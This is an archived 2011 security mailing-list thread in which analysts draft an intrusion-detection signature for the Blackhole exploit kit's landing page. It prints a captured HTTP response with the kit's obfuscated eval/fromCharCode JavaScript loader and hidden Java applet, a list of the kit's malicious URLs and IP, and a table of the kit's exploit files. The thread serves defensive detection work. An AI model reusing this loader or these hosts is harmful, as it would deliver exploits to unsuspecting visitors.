[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Chris Wakelin c.d.wakelin at reading.ac.uk
Mon Oct 3 10:07:59 EDT 2011


Yes, we're still get lots of these too, especially now the Freshers have
arrived!

I think they're still including the unobfuscated "worms.jar" bit at the
top, so hopefully we've got coverage with sid 2013700.

They're also seeming to favour adding 30 to the character codes at the
moment:

function setCharAt(str,q,index) {
        return String.fromCharCode(str.charCodeAt(index) + 30);
}

Looking at the actual exploit kit, they're including the Java and PDF
exploits but not the Flash or HCP exploits (whatever HCP is?) at the moment.

For the record, here's my list of exploits and values of "e=" in the
download URL (names of the files may vary of course):

e=0 - Main.class - "octal" exploit for Java 1.6.0.0-23
e=1 - worms.jar - Java exploit, deobfuscates the parameter
e=2 - new.avi - Java exploit (I haven't collected one of these yet)
e=6 - 2fdp.php - PDF exploit (contains obfuscated Javascript)
e=7 - hcp2.php - HCP exploit (not used very often)
e=8 - field.swf - Flash shellcode exploit

Best Wishes,
Chris

On 03/10/11 14:46, Nick Randolph wrote:
> I've seen a pretty big jump in these at our site. Here are some sites they
> are hitting.
> 194.219.29.139:http://saveatlasshruggedomslovo.info/
> 194.219.29.139:http://downloadrandomslovostore.info/main.php
> 194.219.29.139:http://downloadrandomslovostore.info/content/worms.jar
> 194.219.29.139:http://downloadrandomslovostore.info/support/Pipe.class
> 194.219.29.139:http://newdownload-randomsslovo.info/getJavaInfo.jar
> 194.219.29.139:http://newdownload-randomsslovo.info/content/field.swf
> 
> There is a slight change to the fromCharchode section as well, this is what
> I saw this morning
> 
> String[c+'r'+'omChar'+'C'+'o'+'d'+"e"
> 
> Earlier in the packet there is a "c=f" declaration that makes the above.
> 
> On Tue, Sep 27, 2011 at 4:19 PM, Matthew Jonkman <
> jonkman at emergingthreatspro.com> wrote:
> 
>> Pedro is posting with a change, adding a match for |27|romChar|27| to help
>> protect that pcre. Good?
>>
>> Matt
>>
>>
>> On Sep 26, 2011, at 10:38 AM, Nathan wrote:
>>
>>> Similar to the discussion at
>>>
>> http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-September/015753.html
>>> it looks like thus far we have 3 landing styles.  One covered at the
>> above
>>> thread, another by Chris with \x09, and this third new proposed below.
>>>
>>> Only ET signature that fired was 'worms.jar' and I'd rather not rely
>> solely on
>>> the name of the archive for protection/detection of this kit.
>>>
>>> #/R should match relative to the previous content match.
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
>> CURRENT_EVENTS
>>> Blackhole Exploit Kit Landing Response Malicious applet";
>>> flow:established,from_server; content:"|0d 0a|<html><body><applet
>> code='";
>>> fast_pattern; nocase;
>>>
>> pcre:"/,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/iR";
>>> classtype:bad-unknown; sid:x; rev:1;)
>>>
>>> PCRE version 8.02 2010-03-19
>>>
>>>  re>
>>>
>> /,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/
>>> data>
>>>
>> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,
>>> 0: ,49.5*2,117+l,54.5*2,101+l,55*2,116+l,
>>> data>
>>>
>>>
>>> 09:19:23.734596 IP 194.176.191.62.80 > RFC_1918.1448: . 1:1261(1260) ack
>>> HTTP/1.1 200 OK
>>> Date: Mon, 26 Sep 2011 14:09:18 GMT
>>> Server: Apache/2.2.13 (Linux/SUSE)
>>> X-Powered-By: PHP/5.3.3
>>> Keep-Alive: timeout=15, max=100
>>> Connection: Keep-Alive
>>> Transfer-Encoding: chunked
>>> Content-Type: text/html
>>>
>>> 4d018
>>> <html><body><applet code='support.ForMail.class' archive='./worms.jar'
>>> width='1' height='1'><param name='p'
>>> value='e00oMDDBBBV2./fkqhQNQV%RD.qR/D3D./2h1Voeojfo=8zxa'/></applet><div
>>> id="qwe" style="visibility:hidden;">&#50;</div>
>>> <script>
>>> a=window['document']['getElementById']('qwe');
>>> try{app()}catch(q){
>>> if(1){
>>>        a.innerHTML=+[2];
>>>        cc='ev';
>>> }
>>> }
>>> try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
>>> 1;}catch(q){c='f';v='TML';}
>>> z=a['inne'+'rH'+v];
>>> try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
>>> 1;}catch(q){l=z*1}
>>> if(a.innerHTML == '2')
>>> e=window[cc+'al'];
>>>
>> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,56*2,97
>>>
>> +l,51.5*2,101+l,16*2,105+l,57.5*2,32+l,54*2,111+l,48.5*2,100+l,52.5*2,110+l,51.5*2,46+l,23*2,46+l,30*2,47+l,52*2,49+l,31*2,60+l,23.5*2,99+l,50.5*2,110+l,58*2,
>>>
>>> Thanks,
>>> Nathan
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>> Support Emerging Threats! Subscribe to Emerging Threats Pro
>> http://www.emergingthreatspro.com
>>> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
>> Current!
>>
>>
>> ----------------------------------------------------
>> Matt Jonkman
>> Emerging Threats Pro
>> Open Information Security Foundation (OISF)
>> Phone 866-504-2523 x110
>> http://www.emergingthreatspro.com
>> http://www.openinfosecfoundation.org
>> ----------------------------------------------------
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> Support Emerging Threats! Subscribe to Emerging Threats Pro
>> http://www.emergingthreatspro.com
>> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
>> Current!
>>
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> Support Emerging Threats! Subscribe to Emerging Threats Pro http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through Current!


-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094


More information about the Emerging-sigs mailing list